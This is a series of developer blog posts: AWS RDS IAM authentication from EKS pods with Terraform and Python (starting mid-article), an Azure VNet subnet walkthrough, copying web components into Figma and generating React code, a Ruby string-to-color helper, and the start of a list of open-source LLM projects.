... "Resource": "arn:aws:rds-db:us-east-1:492 ***148:dbuser:db-UZM*** 3SA/db_test" ... ``` Connect with the default user and password that you received when created the RDS instance: ``` $ psql -h ops-monitoring-rds.***.us-east-1.rds.amazonaws.com -U master_user -d ops_monitoring_db ``` Create a new user `db_test`, and set his authentication through the `rds_iam` PostgreSQL role: ``` ops_grafana_db=> CREATE USER db_test; CREATE ROLE ops_grafana_db=> GRANT rds_iam TO db_test; GRANT ROLE ``` For MariaDB, it will be the `AWSAuthenticationPlugin`. ### Connecting with `psql` Documentation — [Connecting to your DB instance using IAM authentication from the command line: AWS CLI and psql client](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.Connecting.AWSCLI.PostgreSQL.html). **_Note_** _: You cannot use a custom Route 53 DNS record instead of the DB instance endpoint to generate the authentication token._ Find the URL of the server’s endpoint: ![](https://cdn-images-1.medium.com/max/464/0*53MiGiQCuWIE6m0-.png) Set a variable with the address: ``` $ export RDSHOST="ops-monitoring-rds.***.us-east-1.rds.amazonaws.com" ``` Using the AWS CLI and the `aws rds generate-db-auth-token` command, get a token - this will be our password: ``` $ export PGPASSWORD="$(aws --profile work rds generate-db-auth-token --hostname $RDSHOST --port 5432 --region us-east-1 --username db_test)" ``` Check it’s content: ``` $ echo $PGPASSWORD ops-monitoring-rds. ***.us-east-1.rds.amazonaws.com:5432/?Action=connect&DBUser=db_test&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=*** %2F20240624%2Fus-east-1%2Frds-db%2Faws4_request&X-Amz-Date=20240624T142442Z&X-Amz-Expires=900&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQo***942 ``` And connect to the RDS: ``` $ psql "host=$RDSHOST sslmode=require dbname=ops_grafana_db user=db_test password=$PGPASSWORD" psql: error: connection to server at "ops-monitoring-rds.***.us-east-1.rds.amazonaws.com" (10.0.66.79), port 5432 failed: FATAL: PAM authentication failed for user "db_test" ``` ### FATAL: PAM authentication failed for user “db_test” In my case, the error occurred because I first generated the token with the “`--region us-west-2`", and the RDS server is located in the `us-east-1` (hello, copy-paste from the documentation :-) ). That is, the error occurs precisely because of errors in the access settings — either a different username is specified in the IAM Policy, or a different name was used during the `CREATE USER`, or a token is generated for a different IAM role. Let’s regenerate the token and try again: ``` $ psql "host=$RDSHOST sslmode=require dbname=ops_grafana_db user=db_test password=$PGPASSWORD" psql (16.2, server 16.3) SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, compression: off) Type "help" for help. ops_grafana_db=> ops_grafana_db=> \dt List of relations Schema | Name | Type | Owner --------+-----------------------------+-------+------------------ public | alert | table | ops_grafana_user public | alert_configuration | table | ops_grafana_user public | alert_configuration_history | table | ops_grafana_user ... ``` Moreover, the `password=$PGPASSWORD` part can be omitted - `psql` will read the `$PGPASSWORD` variable itself, see [Environment Variables](https://www.postgresql.org/docs/current/libpq-envars.html#LIBPQ-ENVARS). `dbname=ops_grafana_db` is here because the server was created for Grafana, and this is its database. Okay — we checked it, it works. Now it’s time for Kubernetes and automation with Terraform — and our adventures are just beginning. ### Terraform, AWS EKS Pod Identity, and IAM database authentication Let’s see how this mechanism will work with Kubernetes Pods and ServiceAccounts. I wrote more about the new scheme of working with Pod ServiceAccounts and IAM in [AWS: EKS Pod Identities — a replacement for IRSA? Simplifying IAM Access Management](https://rtfm.co.ua/en/aws-eks-pod-identities-a-replacement-for-irsa-simplifying-iam-access-management/), but I haven’t used it in production yet. So, what do we need? - an IAM Role with IAM Policy - in the Trusted Policy of this IAM Role we will have `pods.eks.amazonaws.com` - will add the IAM Role to an EKS cluster via the EKS IAM API - will create a Kubernetes Pod and a ServiceAccount - in the Pod, we’ll have a Python code that will connect to RDS That is, the Kubernetes Pod will use the IAM Role from the Kubernetes ServiceAccount to authenticate to the AWS API, then, using this role, it will receive an AWS RDS Token from the AWS API, and with this token, it will connect to RDS. ### Creating AWS EKS Pod Identity with Terraform There is a module for AWS EKS Pod Identity [`eks-pod-identity`](https://registry.terraform.io/modules/terraform-aws-modules/eks-pod-identity/aws/latest?tab=inputs), let's use it. In Terraform, describe an `aws_iam_policy_document` with access to RDS: ``` data "aws_iam_policy_document" "monitoring_rds_policy" { statement { effect = "Allow" actions = [ "rds-db:connect" ] resources = [ "arn:aws:rds-db:us-east-1:${data.aws_caller_identity.current.account_id}:dbuser:${module.monitoring_rds.db_instance_resource_id}/test_user" ] } } ``` The IAM Policy is new, and we’ll use a new user —  `test_user`. In the `${data.aws_caller_identity.current.account_id}` we have our AWS account ID: ``` data "aws_caller_identity" "current" {} ``` And in the `${module.monitoring_rds.db_instance_resource_id}` - the ID of our RDS instance, which was created using the [terraform-aws-modules/rds/aws](https://registry.terraform.io/modules/terraform-aws-modules/rds/aws/latest) module with the `iam_database_authentication_enabled` = true parameter: ``` module "monitoring_rds" { source = "terraform-aws-modules/rds/aws" version = "~> 6.7.0" identifier = "${var.environment}-monitoring-rds" ... # DBName must begin with a letter and contain only alphanumeric characters db_name = "${var.environment}_grafana_db" username = "${var.environment}_grafana_user" port = 5432 manage_master_user_password = true manage_master_user_password_rotation = false iam_database_authentication_enabled = true ... } ``` Next, with [terraform-aws-modules/eks-pod-identity/aws](https://registry.terraform.io/modules/terraform-aws-modules/eks-pod-identity/aws/latest?tab=inputs) we describe an EKS Pod Identity Association, where we use the `aws_iam_policy_document.monitoring_rds_policy` that we made above: ``` module "grafana_pod_identity" { source = "terraform-aws-modules/eks-pod-identity/aws" version = "~> 1.2.1" name = "${var.environment}-monitoring-rds-role" attach_custom_policy = true source_policy_documents = [data.aws_iam_policy_document.monitoring_rds_policy.json] associations = { atlas-eks = { cluster_name = data.aws_eks_cluster.eks.name namespace = "${var.environment}-monitoring-ns" service_account = "eks-test-sa" } } } ``` In the `namespace` we specify a Namespace name in which the ServiceAccount for the Pod will be created, and in the `service_account` - the actual name of the ServiceAccount. `data.aws_eks_cluster.eks.name` is retrieved from the [`data "aws_eks_cluster"`](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/data-sources/eks_cluster): ``` # get info about a cluster data "aws_eks_cluster" "eks" { name = local.eks_name } ``` Deploy it and check the IAM: ![](https://cdn-images-1.medium.com/max/1024/0*XeIfJAalIrnlxC0A.png) And the Pod Identity associations in the AWS EKS cluster: ![](https://cdn-images-1.medium.com/max/1024/0*xnnv0PjT48SpOiGI.png) Now we have an IAM Role with the IAM Policy attached which grants access to the `test_user` user to the RDS instance with the ID `db-UZM***3SA`, and we have an established relationship between the ServiceAccount named `eks-test-sa` in the Kubernetes cluster and this IAM role. ### Python, PostgreSQL, and IAM database authentication What should happen next: - we’ll create a Kubernetes Pod - create a ServiceAccount with the name `eks-test-sa` - will write a Python code that will: - connect to the AWS API using the ServiceAccount and the associated IAM Role - receive an AWS RDS Token - use this token to connect to RDS Log in to RDS with the master user again, and create a new user `test_user` (as specified in the IAM Policy) with the role `rds_iam`: ``` ops_grafana_db=> CREATE USER test_user; CREATE ROLE ops_grafana_db=> GRANT rds_iam TO test_user; GRANT ROLE ops_grafana_db=> GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO test_user; GRANT ``` Create a Kubernetes manifest with the `eks-test-sa` ServiceAccount and a Kubernetes Pod that will use that ServiceAccount in the `namespace=ops-monitoring-ns`: ``` apiVersion: v1 kind: ServiceAccount metadata: name: eks-test-sa namespace: ops-monitoring-ns --- apiVersion: v1 kind: Pod metadata: name: eks-test-pod namespace: ops-monitoring-ns spec: containers: - name: ubuntu image: ubuntu command: ['sleep', '36000'] restartPolicy: Never serviceAccountName: eks-test-sa ``` Deploy: ``` $ kk apply -f eks-test-rds-irsa.yaml serviceaccount/eks-test-sa created pod/eks-test-pod created ``` Connect to the Pod: ``` $ kk exec -ti eks-test-pod -- bash root@eks-test-pod:/# ``` Install the `python-boto3` library to get a token from the code, and the `python3-psycopg2` library to work with PostgreSQL: ``` root@eks-test-pod:/# apt update && apt -y install vim python3-boto3 ``` Write the code: ``` #!/usr/bin/python3 import boto3 import psycopg2 DB_HOST="ops-monitoring-rds.***.us-east-1.rds.amazonaws.com" DB_USER="test_user" DB_REGION="us-east-1" DB_NAME="ops_grafana_db" client = boto3.client('rds') # using Kubernetes Pod ServiceAccount's IAM Role generate another AWS IAM Token to access RDS db_token = client.generate_db_auth_token(DBHostname=DB_HOST, Port=5432, DBUsername=DB_USER, Region=DB_REGION) # connect to RDS using the token as a password conn = psycopg2.connect(database=DB_NAME, host=DB_HOST, user=DB_USER, password=db_token, port="5432") cursor = conn.cursor() cursor.execute("SELECT * FROM dashboard_provisioning") print(cursor.fetchone()) conn.close() ``` Basically, it’s quite simple: connect to AWS, get a token, and connect to RDS. Run it and check the result: ``` root@eks-test-pod:/# ./test-rds.py (1, 1, 'default', '/var/lib/grafana/dashboards/default/nodeexporter.json', 1719234200, 'c2ef5344baf3389f5238679cd1b0ca68') ``` A bit about what exactly happens “under the hood”: - the Kubernetes Pod has a ServiceAccount - the ServiceAccount is associated with the `ops-monitoring-rds-role` IAM Role via Pod Identity associations - the `ops-monitoring-rds-role` IAM Role has an IAM Policy with the Allow on `rds-db:connect` - the Kubernetes Pod uses that IAM Role from the ServiceAccount for authentication and authorization in AWS - and then the Python gets an RDS Token with the `boto3` and `client.generate_db_auth_token` - and uses it to connect to PostgreSQL On the RDS itself, we already have the `test_user` user created with the `rds_iam` and permissions to the databases. For more information on how Kubernetes ServiceAccounts and tokens work at the Kubernetes Pod level, see [AWS: EKS, OpenID Connect, and ServiceAccounts](https://rtfm.co.ua/en/aws-eks-openid-connect-and-serviceaccounts/) (just it was written without Pod Identity associations, but the mechanism is the same). So, the solution we just tried looks like a good option, but there is one more thing. ### Terraform and IAM RDS Authentication: the problems In general, the idea with the Terraform described above seems to be working, but we manually created `test_user` and gave it permissions. And here’s another drawback of the RDS and IAM database authentication scheme, because we still need to create a user in the database server. And this leads to another problem: how to do this with Terraform? I didn’t spend any more time on it, because it’s not really relevant to us as in my case, there will be only a few users, and they can be made manually, and it doesn’t block the current automation. But over time, when the project grows, this issue will still have to be addressed. So, what problems and solutions do we have? - we can create PostgreSQL (or MariaDB) users directly from Terraform code using the PostgreSQL provider, and by running `local-exec` or using `resource "postgresql_grant"` - see examples in [AWS RDS IAM Authentication with Terraform](https://stackoverflow.com/questions/55834290/aws-rds-iam-authentication-with-terraform) and [grant privileges and permissions to a role via terrafrom is not working](https://stackoverflow.com/questions/72176299/grant-privileges-and-permissions-to-a-role-via-terrafrom-is-not-working) - but this requires network access to the RDS instance itself, which is running in the private network of the VPC, and therefore CI/CD requires network access to the VPC, which is possible if you run GitHub Runners (in our case) in Kubernetes, whose WorkerNodes have access to private subnets — but now we are using GitHub hosted Runners, and they don’t have this access - the second option is to use an AWS Lambda function, which will run in the VPC with network access to the RDS, and this function will run PostgreSQL commands to create users - see examples in [Securing AWS RDS with Fine-Grained Access Control using IAM Authentication, Terraform and Serverless](https://ayltai.medium.com/securing-aws-rds-with-fine-grained-access-control-using-iam-authentication-terraform-and-27ddc83d661d) and [Automate post-database creation scripts or steps in an Amazon RDS for Oracle database](https://aws.amazon.com/blogs/database/automate-post-database-creation-scripts-or-steps-in-an-amazon-rds-for-oracle-database/) - seems to be a working option, also instead of AWS Lambda we can use Terraform to run a Kubernetes Pod, which will perform the necessary actions — connect to RDS and `CREATE USER` Both solutions are working, and someday I may describe the implementation of one of them (most likely the second one, using Lambda or EKS Pod). But currently, I don’t see any point in spending time on it. ### Final conclusions And the conclusions are actually a bit ambiguous. The idea of RDS IAM database authentication looks very interesting, but the fact that the RDS token and the regular authentication token in the AWS API for IAM Roles are different entities makes it a bit difficult to implement. If you could connect to RDS just using ServiceAccount and IAM Role, it would be much easier to use. In addition, for some reason, I expected that authorization would be done at the IAM level, i.e. that in the IAM Policy we could specify at least the databases to which we want to grant access. But it remains at the database server level. The second problem is that we still have to create a user in an RDS instance, and set their permissions there, and that again creates additional difficulties in automation. However, in general, RDS IAM database authentication fulfills its task — we really don’t need to create a Kubernetes Secret with a password for the database and mount it to the Kubernetes Pod, but rather we can connect a ServiceAccount to the Pod, and “pass the buck” to the developers, i.e., to perform the authentication it at the code’s level, not Kubernetes. _Originally published at_ [_RTFM: Linux, DevOps, and system administration_](https://rtfm.co.ua/en/aws-rds-iam-database-authentication-eks-pod-identities-and-terraform/)_._ * * *
setevoy
1,915,611
Create an Azure Virtual Network (VNet)
Contents Overview of Azure Virtual Network Steps to Creating Azure Virtual Network ...
0
2024-07-13T04:18:05
https://dev.to/celestina_odili/create-an-azure-virtual-network-vnet-48fp
virtualnet, azure, tutorial, cloudcomputing
Contents <a name="content"></a> [Overview of Azure Virtual Network](#overview) [Steps to Creating Azure Virtual Network ] (#create vnet) ### Overview of Azure Virtual Network <a name="overview"></a> Azure Virtual Network (VNet) is a versatile and powerful service that provides flexibility, security, and scalability required to support a wide range of applications and workloads in the cloud. It enable users to securely connect Azure resources to each other, to the internet, and to on-premises networks. It serves as the backbone for networking within the Azure ecosystem, offering a range of features and capabilities that facilitate secure and efficient communication. ##### Key Features and Capabilities - Isolation and Segmentation: VNets provide logical isolation within the Azure environment, allowing users to create multiple isolated networks. Each VNet is isolated from other VNets, providing a secure environment for deploying resources. - Subnets: A subnet or subnetwork is a network inside a network. VNets can be divided into subnets to enable better organization and management of resources. Subnets can also be used to apply network security policies and route network traffic. - Network Security Groups (NSGs): NSGs allow users to control inbound and outbound traffic to and from network interfaces, VMs, and subnets. They act as virtual firewalls, providing granular control over network traffic. - Azure Firewall: A managed, cloud-based network security service that protects Azure Virtual Network resources. It allows users to define, enforce, and log application and network connectivity policies. - VPN Gateway: This service enables secure cross-premises connectivity between the VNet and on-premises infrastructure through a secure VPN tunnel. It supports both site-to-site and point-to-site configurations. - ExpressRoute: Provides a dedicated, private connection between Azure datacenters and on-premises infrastructure or colocation environments. It offers higher security, reliability, and faster speeds compared to typical internet connections. - Peering: VNet peering allows VNets to communicate with each other directly through the Azure backbone network, enabling low-latency, high-bandwidth connectivity between VNets in the same region or across regions. - Load Balancing: Azure Load Balancer and Application Gateway provide scalable and high-availability network services. They distribute incoming network traffic across multiple servers to ensure reliability and optimal performance. - DNS Services: Azure DNS hosts domain names and resolves DNS queries using Microsoft’s global network of name servers, ensuring high performance and availability. - DDoS Protection: Azure DDoS Protection safeguards applications by scrubbing traffic at the Azure network edge before it can affect service availability. #####Use Cases - Hybrid Cloud Deployments: Securely extend on-premises networks to Azure, enabling a hybrid cloud environment that leverages the benefits of both on-premises and cloud resources. - Multi-Tier Applications: Deploy multi-tier applications with isolated network environments for different tiers (e.g., web, application, and database tiers) to enhance security and manageability. - Disaster Recovery: Utilize VNets for disaster recovery setups, ensuring that critical applications and data can be quickly recovered in the event of a failure. - Big Data and Analytics: Deploy big data and analytics solutions, connecting various services and resources securely within the VNet for efficient data processing and analysis. [back to top](#content) ### Steps to Creating Azure Virtual Network <a name="create vnet"></a> This guide will create an Azure virtual network with four subnets using the address space 192.148.30.0/26 for company XYZ. The four chosen subnets represent four departments in the company which are ICT, Sales, Audit, and Account. Below is a step-by-step guide: ##### Step 1: Log in to the Azure Portal - On your web browser, type portal.azure.com to go to the Azure Portal login page. - Log in with your Azure account credentials or click [here](https://azure.microsoft.com/en-us/free) to create a free one if you do not have an account yet. ##### Step 2: Create a Virtual Network - On the Azure Portal search bar, type Virtual Network and select Virtual Network from the list. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gko2eqserexigdzdtrri.jpg) - click Create. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tk4ao8yotpfvir2ltmx7.jpg) ##### Step 3: Configure the Virtual Network Basics In the Basics tab, fill in the following details: - Subscription: Select the subscription to use. - Resource group: Create a new resource group or select an existing one. - Name: Enter a name for the VNet (example: XYZ-VNet). - Region: Select the region where you want to create the VNet. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ng1m3qbd0txvy9nn559f.jpg) ##### Step 4: Configure the Address Space - Click on the IP Addresses tab. - Under IPv4 address space, - Enter 192.148.30.0 in the Address space field and select /26 on the CIDR field then delete the default subnet created and add your subnets. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/t4x6clqe63fusajobjs0.jpg) ##### Step 5: Add Subnets add four subnets for ICT, Sale, Audit and Account department **For ICT Subnet:** Under the Subnets section of the address space, 1. click on + Add subnet. On the Add subnet screen, 2. enter or select values for the subnet settings. Enter the following details for example: - Subnet name: ICT - Starting address: 192.148.30.0 - size: select /28 - Click Add ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kv93w0z55b16psnfk4fn.jpg) **For sales Subnet:** - click on + Add subnet - Subnet name: sales - starting address: 192.148.30.16 - Size:/28 - Click Add Do the same for the other two subnets with the following details: **For Audit Subnet:** - Subnet name: Audit - starting address: 192.148.30.32 - Size:/28 - Click Add **For account Subnet:** Subnet name: Account - starting address : 192.148.30.48 - Size:/28 - Click Add ##### Step 6: Review and Create the VNet Once all subnets are added, - click on the Review + create button at the bottom of the page. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kbvfy6r4s0dtq2w5m7kb.jpg) - Review the settings to ensure everything is configured correctly. - Click Create to deploy the Virtual Network. ##### Step 7: Verify the Deployment - After the deployment is complete, click Go to resource to see the overview. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/65mjqvg2nl5zbnifxv1k.jpg) Ensure that the subnets are created with the correct address ranges. - On the left pane, click setting - select subnets ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8d563w6s8la87h1uyx9j.jpg) _By the way, if this is for practice only, endeavor to delete the virtual network after creating to avoid unnecessary costs._ [back to top](#content)
celestina_odili
1,915,757
Easily copy any Live website to Figma and then to your App
Picasso was quoted saying “good artists borrow, great artists steal.” I totally agree with this...
0
2024-07-14T13:40:59
https://dev.to/dellboyan/easily-copy-any-live-website-to-figma-and-then-to-your-app-436d
webdev, javascript, programming, ai
Picasso was quoted saying “good artists borrow, great artists steal.” I totally agree with this point, I think you should steal whenever there's opportunity to do so easily, and in this post, I'll show you how you can straight up steal any design you want. I'm just kidding, stealing is wrong and blah blah, we should all be decent human beings and respect each other, but let's explore a method how you can easily get any component you want from some website and adjust it for your project and use case. Let's say you are browsing a cool website and you saw a date picker component or a profile card that you like. With this approach you can have that component in your app in less then a couple of minutes. First tool we'll use is [figma.to.html](https://html.to.design/home). This is a really cool tool that will allow us to select any section of a website and open it inside Figma. You'll need to install their [Google Chrome extension](https://chromewebstore.google.com/detail/htmltodesign/ldnheaepmnmbjjjahokphckbpgciiaed?hl=en) and [Figma plugin](https://www.figma.com/community/plugin/851183094275736358/figma-to-html) as well. First step is to find a component you would like to copy, I was browsing awwwards.com directory and thought I might copy a component for one website. To save a certain section inside Figma you need to click on html.to.design chrome extension and then on Selection (or click Alt+Shift+D) and just select the component you want. ![html.to.design chrome extension](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sr7lsvbfdlhos1zvyplm.png) ![Awwwards Directory](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/83t7lg33couy8tbrnk41.png) Once you click on a selection it will automatically download a file that you can import inside Figma. Next up, open up Figma and then from plugins click on html.to.design. Once the plugin opens up, select the file you just downloaded and check all the fields. ![html.to.design figma plugin](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/urz9hnqv2zbm00esndrs.png) ![html.to.design figma plugin options](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2hmjh4iitkls9oejtbz7.png) Finally click on Go, and you will get your component loaded up inside Figma. Sometimes it will not match the design 100% but I tested a couple of these plugins and I've found that this one works the best. Feel free to fix any styling that didn't import correctly and modify the design to match your liking. In my case import was not 100% correct and I had to fix a table. ![Loaded figma design with bugs](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4mkdfutn6jx1glmb8lda.png) After I fixed this table component was perfect and ready for the export. ![Fixed component](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/95jc3ee7ijxng7gvzq2y.png) To get the code for this component we will use another [plugin for Figma from Builder.io](https://www.figma.com/community/plugin/747985167520967365/builder-io-ai-powered-figma-to-code-react-vue-tailwind-more). Just like for html.to.design there are many plugins for Figma that are used to get code from design. From my experience none of them work perfectly, this one from Builder.io is also not perfect, but I've found it works the best out of all of them. ![Builder.io Figma plugin](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wlj07czjmpulsyzgn72y.png) Just open up the plugin, select the entire component in Figma and click on Generate code. It will open up Builder.io website with your design, this tool will generate the entire code for your component. ![Builder.io Dashboard](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xruj9vftjjw7wbjf8v1x.png) Inside the Builder.io dashboard you can choose to generate code with React, Qwik, Vue, Svelte, React Native, Angular, HTML, Mitrosis, Solid and Marko with styling in Tailwind and CSS, you are also able to edit the component with their editor. Once I generated the code I got three components: ProfileCard.tsx that contains InfoRow.tsx and AwardCounter.tsx. Let's examine them: ProfileCard.tsx: ``` import React from "react"; import AwardCounter from "@/components/AwardCounter"; import InfoRow from "@/components/InfoRow"; interface ProfileCardProps { imageUrl: string; avatarUrl: string; name: string; isPro: boolean; location: string; website: string; awards: { type: string; count: number; }[]; } const ProfileCard: React.FC<ProfileCardProps> = ({ imageUrl, avatarUrl, name, isPro, location, website, awards, }) => { return ( <article className="flex flex-col bg-white rounded-lg max-w-[435px]"> <img loading="lazy" src={imageUrl} alt="Profile cover" className="w-full aspect-[1.33]" /> <header className="flex gap-3 self-start mt-8 ml-8 text-neutral-800"> <img loading="lazy" src={avatarUrl} alt={`${name}'s avatar`} className="shrink-0 aspect-square w-[60px]" /> <div className="flex gap-0.5 justify-between my-auto"> <h1 className="text-2xl font-bold leading-6">{name}</h1> {isPro && <span className="text-xs font-medium leading-6">PRO</span>} </div> </header> <InfoRow label="Location" value={location} /> <InfoRow label="Website" value={website} /> <section className="px-8 py-7 w-full border-t border-gray-200 border-solid"> <div className="flex gap-5 max-md:flex-col max-md:gap-0"> <h2 className="text-sm font-bold leading-5 text-neutral-800 w-[44%] max-md:w-full"> Awards </h2> <div className="flex grow gap-0 self-stretch text-center whitespace-nowrap text-neutral-800 w-[56%] max-md:w-full"> {awards.map((award, index) => ( <AwardCounter key={index} type={award.type} count={award.count} isLast={index === awards.length - 1} /> ))} </div> </div> </section> </article> ); }; export default ProfileCard; ``` InfoRow.tsx ``` import React from "react"; interface InfoRowProps { label: string; value: string; } const InfoRow: React.FC<InfoRowProps> = ({ label, value }) => { return ( <div className="flex gap-5 justify-between px-8 py-7 w-full border-t border-gray-200 border-solid text-neutral-800"> <div className="text-base font-bold leading-5">{label}</div> <div className="text-sm font-light leading-5">{value}</div> </div> ); }; export default InfoRow; ``` AwardCounter.tsx ``` import React from "react"; interface AwardCounterProps { type: string; count: number; isLast: boolean; } const AwardCounter: React.FC<AwardCounterProps> = ({ type, count, isLast }) => { const borderClasses = isLast ? "rounded-none border border-solid border-neutral-800" : "border-t border-b border-l border-solid border-neutral-800"; return ( <div className={`flex flex-col py-px pl-px ${borderClasses}`}> <div className="text-xs font-medium leading-4">{type}</div> <div className="px-2 pt-3 pb-3 mt-1.5 text-xs font-bold leading-4 border-t border-solid border-neutral-800"> {count} </div> </div> ); }; export default AwardCounter; ``` When I import ProfileCard component inside my page this is what I get. ``` import ProfileCard from "@/components/ProfileCard"; export default function Home() { return ( <div className="flex flex-col h-screen"> <ProfileCard imageUrl="https://assets.awwwards.com/awards/avatar/87991/6656d09421dac549404842.png" avatarUrl="https://assets.awwwards.com/awards/media/cache/thumb_user_retina/avatar/87991/620f9ee354b1b133493338.jpeg" name="Red Collar" isPro={true} website="https://redcollar.com" location="Los Angeles, CA" awards={[ { type: "BW", count: 5 }, { type: "MB", count: 19 }, { type: "APP", count: 3 }, ]} /> </div> ); } ``` As you can see, the code Builder.io generated created a reusable component with props already defined which is quite impressive! The end result looks like this: ![Generated component with Builder.io](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/oci13bpyb7sud1o84gjs.png) This might seem like a long post but the entire process took a couple of minutes. I'm not saying you should steal design from other websites, but you can use this method to speed up your workflow for sure when you are inspired by some design that you saw. You can also use builder.io plugin to convert your one Figma designs much faster or to test how a certain component might fit into your designs. Sometimes I use this method to convert simpler components from Figma into code and then I adjust it, I found it speeds up my workflow so hopefully it can help you too. I'm interested to hear what you guys think of this approach and do you think it makes sense for you, feel free to comment bellow. [Let's connect on x.com](https://x.com/DellBoyan)
dellboyan
1,915,771
Create a String to Color Helper with Ruby (and Rails)
This article was originally published on Rails Designer. In the latest version (v1) of Rails...
0
2024-07-15T08:00:00
https://railsdesigner.com/uby-string-to-colors/
ruby, rails, webdev
This article was originally published on [Rails Designer](https://railsdesigner.com/uby-string-to-colors/). --- In the [latest version (v1) of Rails Designer](https://railsdesigner/com/) I added a [Chat Messages Component](https://railsdesigner.com/components/chats/). For one of the provided variants I wanted to have a [different background- and text-color based on the user's name](https://railsdesigner.com/components/chats/#group-chat). I like this kind of “random” customizations to UI components, as it gives an otherwise monotone UI layout some sparkle. In the context of chat messages it works well too differentiate between the different messages from users. I used a similar technique for the [AvatarComponent](https://railsdesigner.com/components/avatars/). Here, when no profile picture is available (`attached`), it calculates the color for the user name's initial. I typically calculate these colors at runtime, but I can imagine, when your app grows, to store them alongside the user in some sort of [preferences model](https://railsdesigner.com/simple-preferences/). > [Rails Designer](https://railsdesigner.com/) is a professionally designed UI components library for Rails. Built with ViewComponent. Designed with Tailwind CSS. Enhanced with Hotwire. Build beautiful, faster. For the example of the chat messages I wanted to pick one of [Tailwind CSS' colors](https://tailwindcss.com/docs/customizing-colors). This is because the the background- and text color is set as follows: ```ruby # … def initialize(name:) @name = name @color = string_to_color(name) end def chat_css = class_names("px-3 py-1 rounded", states[@color]) def states { red: "bg-red-100 text-red-800", blue: "bg-blue-100 text-blue-800" # … } end ``` (example simplified for demonstration purposes) So how does the `string_to_color` helper look like? It's pretty straight-forward. Let's see: ```ruby # app/helpers/string_to_color.rb module StringToColorHelper def string_to_color(string, colors: TAILWIND_COLORS) hash_value = string.downcase.each_char.sum(&:ord) index = hash_value % colors.length colors[index] end private TAILWIND_COLORS = %w[ slate gray zinc neutral stone red orange amber yellow lime green emerald teal cyan sky blue indigo violet purple fuchsia pink rose ].freeze end ``` It calculates a hash value (`hash_value`) from the given string by converting each character to its ASCII value. So given a string of `Example` will output: ```ruby "Example".downcase.each_char # ['e', 'x', 'a', 'm', 'p', 'l', 'e'] ``` Then, based on the ASCII characters, the sum is returned. ```ruby "Example".downcase.each_char.sum(&:ord) # `&:ord` → [101, 120, 97, 109, 112, 108, 101] # `sum()` → 748 ``` This sum is then used to select an index from the `colors` array. Using the modulus of the `hash_value` (`hash_value % colors.length`) with the length of the colors array ensures the index is always within the bounds of the array. By default this uses the `TAILWIND_COLORS` constant, thus always returning `slate`, `gray`, `red`, etc. But you can also pass another array with hexadecimal colors (directly) to the method. Like this: `string_to_color("Example", colors: ["#3498DB", "#2ECC71", "#F1C40F"])`. V1 of Rails Designer comes with this new helper out of the box. [Check out the docs for more details](https://railsdesigner.com/docs/view-helpers/#string-to-color).
railsdesigner
1,916,142
21 Open Source LLM Projects to Become 10x AI Developer
The time of AI is high especially because of powerful LLMs like GPT-4o and Claude. Today, I'm...
0
2024-07-17T09:00:56
https://blog.latitude.so/21-open-source-llm-projects/
programming, opensource, ai, webdev
The time of AI is high especially because of powerful LLMs like GPT-4o and Claude. Today, I'm covering 21 open source LLM projects that can help you to build something exciting and integrate AI into your project. As a developer, I can confidently say that AI is not as scary as others make it sound and those who don't learn will get left behind. Let's cover it all. ![gif](https://media4.giphy.com/media/v1.Y2lkPTc5MGI3NjExZ21oZnA1ZDlzaHVsMHdrOHFvYzJvdHlucnhiZjA2dmU0d21idmFrbiZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/dJHaTbNQOjYMWdHSTG/giphy.webp) --- By the way, I'm part of Latitude and we're building an open source LLM development platform. You can join the waitlist at [ai.latitude.so](https://ai.latitude.so/). You would be able to do a lot of cool stuff like: ⚡ Deploy prompts as api endpoints. ⚡ Automated evaluations using LLMs. ⚡ Collaborate on prompt engineering. I'm very confident that you will love it after its release! {% cta https://ai.latitude.so/ %} Join Waitlist ⭐️ {% endcta %} ![llm platform by latitude](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/d1xuu1yhksyd2yy4dnsx.png) --- ## 1. [Vanna](https://github.com/vanna-ai/vanna) - Chat with your SQL database. ![vanna](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/uxryt1lsw41hwt31bqti.png) &nbsp; Vanna is an MIT-licensed open-source Python RAG (Retrieval-Augmented Generation) framework for SQL generation. Basically, it's a Python package that uses retrieval augmentation to help you generate accurate SQL queries for your database using LLMs. It's perfect for developers like me who are not very fond of SQL queries! ![low level diagram on how vanna works](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sinq74k898iyfvsnjimx.png) Vanna works in two easy steps - train a `RAG model` on your data, and then ask questions that will return SQL queries that can be set up to run on your database automatically. ![how vanna works](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/5fjc5966fphrge71s8sg.png) You don't need to know how this whole stuff works to use it. You just have to `train` a model, which stores some metadata, and then use it to `ask` questions. Get started with the following command. ```npm pip install vanna ``` To make things a little easier, they have built user interfaces that you can use as a starting point for your own custom interface. Find all the [interfaces](https://github.com/vanna-ai/vanna?tab=readme-ov-file#user-interfaces) including Jupyter Notebook and Flask. ![variations](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/20nymucrkb9wlsvi4kpd.png) You can read the [docs](https://vanna.ai/docs/) and you can try this [Colab 